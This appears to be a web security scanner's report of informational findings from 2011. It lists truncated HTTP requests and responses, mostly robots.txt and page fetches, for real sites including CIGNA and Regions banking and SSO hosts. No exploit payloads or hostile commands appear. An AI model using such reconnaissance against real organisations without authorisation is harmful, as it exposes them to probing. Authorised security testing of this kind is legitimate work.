| HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Mon, 16 May 2011 16:15:21 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.2-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: success=deleted; expires=Sun, 16-May-2010 16:15:20 GMT Set-Cookie: success_cookie_name Vary: Accept-Encoding Content-Length: 13932 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... urn "static.olark.com ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Tentative | 
| Host: | http://www.placelocal.com | 
| Path: | /forgot_password.php | 
| GET /forgot_password.php HTTP/1.1 Host: www.placelocal.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.paperg.com Cookie: PHPSESSID=4d3oqoeopj | 
| HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Mon, 16 May 2011 16:15:07 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.2-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: success=deleted; expires=Sun, 16-May-2010 16:15:06 GMT Set-Cookie: success_cookie_name Vary: Accept-Encoding Content-Length: 8160 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... urn "static.olark.com ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://ol5u8o2ka38be | 
| Path: | /gadgets/makeRequest | 
| GET /gadgets/makeRequest Host: ol5u8o2ka38be34j62kt Proxy-Connection: keep-alive Referer: http://ol5u8o2ka38be User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=209791819 | 
| HTTP/1.1 200 OK Expires: Mon, 16 May 2011 15:32:44 GMT Content-Disposition: attachment;filename=p.txt Content-Type: application/json; charset=UTF-8 Date: Mon, 16 May 2011 14:32:44 GMT X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Cache-Control: public,max-age=3600 Age: 1 Content-Length: 379 throw 1; < don't be evil' >{"http://fcgadgets ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://ajax.googleapis | 
| Path: | /ajax/services/feed/load | 
| GET /robots.txt HTTP/1.0 Host: ajax.googleapis.com | 
| HTTP/1.0 200 OK Content-Type: text/plain; charset=UTF-8 Last-Modified: Mon, 23 Aug 2010 20:43:16 GMT Date: Mon, 16 May 2011 17:08:06 GMT Expires: Mon, 16 May 2011 17:08:06 GMT Cache-Control: private, max-age=0 Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block User-agent: * Disallow: /search Disallow: /groups Disallow: /images Disallow: /catalogs Disallow: /catalogues Disallow: /news Allow: /news/directory Disallow: /nwshp Disallow: /setnewsprefs? Disallow: ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | / | 
| GET /robots.txt HTTP/1.0 Host: cigna.com | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:29:11 GMT Content-length: 507 Content-type: text/plain Last-modified: Tue, 29 Jun 2010 13:49:12 GMT Accept-ranges: bytes Connection: close # robots.txt for CIGNA.com 20070108 # General items User-agent: * Disallow: /cgi-bin/ Disallow: /css/ Disallow: /encryption/ Disallow: /images/ Disallow: /includes/ Disallow: /js/ Disallow: /kbase/ D ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://feeds.bbci.co.uk | 
| Path: | /news/rss.xml | 
| GET /robots.txt HTTP/1.0 Host: feeds.bbci.co.uk | 
| HTTP/1.0 200 OK Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT Server: Apache Content-Length: 464 Content-Type: text/plain Cache-Control: max-age=2886 Expires: Mon, 16 May 2011 15:38:44 GMT Date: Mon, 16 May 2011 14:50:38 GMT Connection: close User-agent: * Disallow: /cgi-bin Disallow: /cgi-perl Disallow: /lexaurus Disallow: /mpapps Disallow: /mpsearch Disallow: /mtk Disallow: /weatherbeta Disallow: /weather/hi/about/newsid ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | /web/public/guest | 
| GET /robots.txt HTTP/1.0 Host: my.cigna.com | 
| HTTP/1.1 200 OK connection: close content-length: 139 content-type: text/plain date: Mon, 16 May 2011 15:30:23 GMT last-modified: Fri, 13 May 2011 17:34:39 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: WebSEAL/6.0.0.3 (Build 060807) # robots.txt for myCIGNA.com 20110420 # Exclude Files From All Robots: User-agent: * Disallow: /web/secure/ # End robots.txt file | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://newsrss.bbc.co.uk | 
| Path: | /rss/newsonline_world | 
| GET /robots.txt HTTP/1.0 Host: newsrss.bbc.co.uk | 
| HTTP/1.0 200 OK Server: Apache Last-Modified: Tue, 17 Mar 2009 16:14:11 GMT Content-Length: 26 Content-Type: text/plain Cache-Control: max-age=83079404 Expires: Thu, 02 Jan 2014 04:27:21 GMT Date: Mon, 16 May 2011 14:50:37 GMT Connection: close User-agent: * Disallow: / | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://themes.google | 
| Path: | /image | 
| GET /robots.txt HTTP/1.0 Host: themes.googleusercontent | 
| HTTP/1.0 200 OK Content-Type: text/plain Date: Mon, 16 May 2011 14:32:33 GMT Expires: Mon, 16 May 2011 14:32:33 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE User-agent: * Disallow: / | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.blogger.com | 
| Path: | /dyn-css/authorization | 
| GET /robots.txt HTTP/1.0 Host: www.blogger.com | 
| HTTP/1.0 200 OK Expires: Mon, 16 May 2011 15:32:31 GMT Last-Modified: Tue, 10 May 2011 20:25:18 GMT Content-Type: text/plain Date: Mon, 16 May 2011 14:32:31 GMT X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Cache-Control: public Age: 0 # robots.txt for http://www.blogger.com User-agent: * Disallow: /profile-find.g Disallow: /comment.g Disallow: /email-post.g Disallow: /share-post-menu.g | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.cloudscan.me | 
| Path: | /p/enterprise-exploit | 
| GET /robots.txt HTTP/1.0 Host: www.cloudscan.me | 
| HTTP/1.0 200 OK Content-Type: text/plain; charset=UTF-8 Expires: Mon, 16 May 2011 21:49:57 GMT Date: Sun, 15 May 2011 21:49:57 GMT Last-Modified: Sun, 15 May 2011 21:42:26 GMT ETag: "1293c586-5e05-4af4-b87d X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Age: 60152 Cache-Control: public, max-age=86400, proxy-revalidate, must-revalidate User-agent: Mediapartners-Google Disallow: User-agent: * Disallow: /search Disallow: /related-content.g Disallow: /related_content_helper Sitemap: http://www.cloudscan.me ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.frontrowusa | 
| Path: | / | 
| GET /robots.txt HTTP/1.0 Host: www.frontrowusa.com | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:22:42 GMT Server: Apache Last-Modified: Fri, 05 Nov 2010 19:53:17 GMT ETag: "3278ca-21-49453a027c540" Accept-Ranges: bytes Content-Length: 33 Vary: Accept-Encoding,User Connection: close Content-Type: text/plain; charset=UTF-8 User-agent: * Disallow: /Event/ | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.google | 
| Path: | /__utm.gif | 
| GET /robots.txt HTTP/1.0 Host: www.google-analytics.com | 
| HTTP/1.0 200 OK Content-Type: text/plain Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT Date: Mon, 16 May 2011 14:32:42 GMT Expires: Mon, 16 May 2011 14:32:42 GMT Cache-Control: private, max-age=0 Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block User-agent: * Disallow: /siteopt.js Disallow: /config.js | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.placelocal.com | 
| Path: | /forgot_password.php | 
| GET /robots.txt HTTP/1.0 Host: www.placelocal.com | 
| HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Mon, 16 May 2011 15:19:41 GMT Content-Type: text/plain Connection: close Last-Modified: Thu, 30 Sep 2010 21:08:43 GMT Accept-Ranges: bytes Content-Length: 317 Cache-Control: max-age=604800 Expires: Mon, 23 May 2011 15:19:41 GMT Vary: Accept-Encoding # robots.txt - production environment # # In the production environment, we configure the webserver to serve # this instead of the more restrictive default. # # See http://www.robotstxt.org ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | / | 
| GET /robots.txt HTTP/1.0 Host: www.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 41 Content-Type: text/plain Last-Modified: Fri, 01 Aug 2008 19:11:07 GMT Accept-Ranges: bytes ETag: "7727255aaf4c81:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:50 GMT Connection: keep-alive User-agent: * Disallow: \VirtualMedia\ | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /personal_banking.rf | 
| GET /robots.txt HTTP/1.0 Host: www.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Content-Length: 41 Content-Type: text/plain Last-Modified: Fri, 01 Aug 2008 19:11:07 GMT Accept-Ranges: bytes ETag: "7727255aaf4c81:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:52 GMT Connection: keep-alive User-agent: * Disallow: \VirtualMedia\ | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://cignaforhcp.cigna | 
| Path: | / | 
| GET / HTTP/1.1 Host: cignaforhcp.cigna.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-length: 273 content-type: text/html date: Mon, 16 May 2011 15:31:32 GMT last-modified: Sun, 15 May 2011 10:00:00 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: WebSEAL/6.0.0.3 (Build 060807) <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN"> <HTML> <HEAD> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <TITLE></TITLE> </HEAD> <body onLoad="document.webseal ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://cignaforhcp.cigna | 
| Path: | /ProviderTheme/themes | 
| GET /ProviderTheme/themes Host: cignaforhcp.cigna.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-length: 318 content-type: text/plain date: Mon, 16 May 2011 15:31:58 GMT last-modified: Mon, 20 Dec 2010 18:20:32 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server Set-Cookie: PD_STATEFUL_32910a44-289d ..............(.......(.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://cignaforhcp.cigna | 
| Path: | /corp/sso/styles/portal | 
| GET /corp/sso/styles/portal Host: cignaforhcp.cigna.com Connection: keep-alive Referer: https://cignaforhcp.cigna User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK accept-ranges: bytes content-length: 4554 content-type: text/css date: Mon, 16 May 2011 15:30:17 GMT etag: "110e-11ca-8685f4c0" last-modified: Mon, 18 Oct 2010 12:43:39 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server age: 81 <style> body { background-color : #FFFFFF; } .cignabody { font-family: "Arial", sans-serif; font-size: 11pt; color: #000000; } P, TD, UL, span { font-family: "Arial", ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://cignaforhcp.cigna | 
| Path: | /wps/CacheProxyServlet | 
| GET /wps/CacheProxyServlet Host: cignaforhcp.cigna.com Connection: keep-alive Referer: https://cignaforhcp.cigna User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-type: application/xhtml+xml date: Mon, 16 May 2011 15:31:37 GMT last-modified: Mon, 20 Dec 2010 22:55:42 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server cache-control: public, max-age=432000, post-check=172000 Content-Length: 102026 var wptheme_DebugUtils = { // summary: Collection of utilities for logging debug messages. enabled: false, log: function ( /*String*/className, /*String*/message ) { ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | / | 
| GET / HTTP/1.1 Host: my.cigna.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-type: text/html date: Mon, 16 May 2011 15:30:31 GMT last-modified: Sun, 15 May 2011 10:00:00 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: WebSEAL/6.0.0.3 (Build 060807) Content-Length: 297 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN"> <HTML> <HEAD> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <TITLE></TITLE> </HEAD> <body onLoad="document.webseal <f ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | /mycignatheme/themes/html | 
| GET /mycignatheme/themes/html Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/web User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-length: 139 content-type: text/plain date: Mon, 16 May 2011 15:31:05 GMT last-modified: Fri, 22 Apr 2011 16:46:54 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server Set-Cookie: PD_STATEFUL_cf31cef6-4b84 .PNG . ...IHDR.................... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | /web/public/guest | 
| POST /web/public/guest HTTP/1.1 Host: my.cigna.com Connection: keep-alive Referer: http://www.mycigna.com/ Cache-Control: max-age=0 Origin: http://www.mycigna.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 Content-Length: 0 | 
| HTTP/1.1 200 OK content-language: en-US content-location: https://my.cigna.com/web content-type: text/html; charset=UTF-8 date: Mon, 16 May 2011 15:30:21 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server vary: User-Agent,Cookie x-old-content-length: 22481 ibm-web2-location: /web/public/guest/!ut/p cache-control: private, max-age=60 expires: Mon, 16 May 2011 15:31:21 GMT Set-Cookie: TLTSID=698A01C87FD11 Set-Cookie: TLTUID=698A01C87FD11 Set-Cookie: PD_STATEFUL_ccb88d86-4b84 Content-Length: 22491 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/includes/portal | 
| GET /corp/sso/includes/portal Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:30:41 GMT Content-length: 2621 Content-type: text/css Set-Cookie: TLTHID=756B01F47FD11 Etag: "4ceaf758-1-0-a3d" Last-modified: Wed, 21 Jan 2004 14:36:30 GMT Accept-ranges: bytes <style> body { background-color : #FFFFFF; } P, TD, UL { font-family: "Arial", "Helvetica", sans-serif; font-size: 9pt; color: #000000; font-style: normal; } .body { ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/professional | 
| GET /corp/sso/professional Host: sso.corp.cigna.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:30:39 GMT Content-type: text/html;charset=ISO Set-Cookie: TLTHID=741A6F2E7FD11 Set-Cookie: TLTSID=741A6F2E7FD11 Content-language: en Set-cookie: JSESSIONID=0001aplKy Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>CIGNAaccess.com - Forgotten Password - Enter User Name</title> <link rel="ST ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.paperg.com | 
| Path: | /privacy.htm | 
| GET /privacy.htm HTTP/1.1 Host: www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: http://www.placelocal.com Cookie: PHPSESSID=shsfh547e8 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 16:21:42 GMT Server: Apache Last-Modified: Tue, 13 Apr 2010 15:59:16 GMT ETag: "5a24-4842057efdd00" Accept-Ranges: bytes Vary: Accept-Encoding Keep-Alive: timeout=5, max=15000 Connection: Keep-Alive Content-Type: text/html Content-Length: 23076 <html xmlns:v="urn:schemas xmlns:o="urn:schemas xmlns:w="urn:schemas xmlns="http://www.w3.org <head> < ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://wwwa.applyon | 
| Path: | /USCCapp/static/error | 
| GET /USCCapp/static/error Host: wwwa.applyonlinenow.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=0000 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:28:16 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2 Last-Modified: Wed, 04 Nov 2009 19:27:38 GMT Content-Length: 2018 Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <title>We apologize for any inconvenience.</title ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://translate | 
| Path: | /translate_static/js | 
| GET /translate_static/js Host: translate.googleapis.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.xsnet.com/ | 
| HTTP/1.1 200 OK Content-Type: text/javascript Last-Modified: Thu, 20 Jan 2011 00:45:53 GMT Date: Mon, 16 May 2011 15:43:04 GMT Expires: Wed, 11 May 2011 20:56:54 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 5091 Cache-Control: public, max-age=7200 Content-Length: 96489 (function(){function h(a){throw a;}var i=true,j=null,l=false,aa ...[SNIP]... <head><meta http-equiv="Content-Type" content="text/html; charset=UTF8"><link rel="stylesheet" type="text/css" href="',a.A,'"> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /sites/toolkit/managers | 
| GET /sites/toolkit/managers Host: cigna.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:29:54 GMT Content-type: text/html Cache-control: no-cache Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>CIGNA.com - Managers' STD Toolkit</title> <link rel="STYLESHEET" type="text/css" href="/sites/toolkit ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /sites/toolkit/managers | 
| GET /sites/toolkit/managers Host: cigna.com Proxy-Connection: keep-alive Referer: http://cigna.com/sites User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:30:32 GMT Content-type: text/html Cache-control: no-cache Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Managers' Disability Toolkit - Return-to-Work</title> <link rel="STYLESHEET" type="text/css" href="/sites/toolki ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /sites/toolkit/physicians | 
| GET /sites/toolkit/physicians Host: cigna.com Proxy-Connection: keep-alive Referer: http://cigna.com/sites User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:34:18 GMT Content-type: text/html Cache-control: no-cache Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Physicians' Disability Toolkit - Forms</title> <link rel="STYLESHEET" type="text/css" href="../../includes ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /sites/toolkit/physicians | 
| GET /sites/toolkit/physicians Host: cigna.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:30:14 GMT Content-type: text/html Cache-control: no-cache Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>CIGNA.com - Physicians' Disability Toolkit</title> <link rel="STYLESHEET" type="text/css" href="includes/style.c ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://cignaforhcp.cigna | 
| Path: | /wps/CacheProxyServlet | 
| GET /wps/CacheProxyServlet Host: cignaforhcp.cigna.com Connection: keep-alive Referer: https://cignaforhcp.cigna User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-type: application/xhtml+xml date: Mon, 16 May 2011 15:31:37 GMT last-modified: Mon, 20 Dec 2010 22:55:42 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server cache-control: public, max-age=432000, post-check=172000 Content-Length: 102026 var wptheme_DebugUtils = { // summary: Collection of utilities for logging debug messages. enabled: false, log: function ( /*String*/className, /*String*/message ) { ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | / | 
| GET / HTTP/1.1 Host: secureapps.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Cookie: secureapps.regions.com | 
| HTTP/1.1 403 Forbidden Set-Cookie: secureapps.regions.com Content-Length: 218 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:41:40 GMT <html><head><title>Error< <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | / | 
| GET / HTTP/1.1 Host: sso.corp.cigna.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
